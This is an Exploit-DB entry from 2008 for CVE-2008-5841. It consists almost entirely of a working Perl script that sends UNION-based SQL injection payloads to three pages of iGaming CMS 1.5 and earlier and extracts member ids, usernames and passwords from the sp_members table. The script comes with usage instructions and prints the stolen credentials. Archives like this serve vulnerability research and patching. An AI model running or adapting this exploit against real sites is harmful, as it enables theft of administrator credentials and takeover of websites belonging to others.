iGaming CMS <= 1.5 - Multiple Remote SQL Injection Exploit

2008-09-23T00:00:00
ID EDB-ID:6540
Type exploitdb
Reporter StAkeR
Modified 2008-09-23T00:00:00

Description

iGaming CMS <= 1.5 Multiple Remote SQL Injection Exploit. CVE-2008-5841. Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl
# ----------------------------------------------------------
# iGaming &lt;= 1.5 Multiple Remote SQL Injection Exploit
# Perl Exploit - Output: id:admin:password
# Discovered On: 23/09/2008
# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it
# Proud To Be Italian 
# ----------------------------------------------------------
# Usage: perl exploit.pl http://localhost/iGaming
# ----------------------------------------------------------

use strict;
use LWP::UserAgent;

my ($one,$two,$exec,$host,$http,$xxx,$view);

$view  = "'%20union%20select%200,0,1,2,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),0,6,7,8%20from%20sp_members%20WHERE%20id='1/*";
$exec  = "'%20union%20select%201,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),3%20from%20sp_members%20where%20id='1/*";
$host = shift @ARGV;
$http = new LWP::UserAgent or die $!;
$http-&gt;agent("Mozilla/4.5 [en] (Win95; U)");
$http-&gt;timeout(1);
                          

if($host !~ /^http:\/\/(.+?)$/)
{
  print "[?] iGaming CMS &lt;= 1.5 Multiple Remote SQL Injection Exploit\n";
  print "[?] Usage: perl $0 http://[path]\n";
  exit;
}
else
{
  $one = $http-&gt;get($host.'/previews.php?browse='.$exec);
  $two = $http-&gt;get($host.'/reviews.php?browse='.$exec);
  $xxx = $http-&gt;get($host.'/index.php?do=viewarticle&id='.$view);
  
  if($one-&gt;is_success or $two-&gt;is_success or $xxx-&gt;is_success)
  {
    die "$1\n" if $one-&gt;content =~ /%(.+?)%/;
    die "$1\n" if $two-&gt;content =~ /%(.+?)%/;
    die "$1\n" if $xxx-&gt;content =~ /%(.+?)%/;
  }
  else
  {
    die "[+] Exploit Failed!\n";
  }
}  

# milw0rm.com [2008-09-23]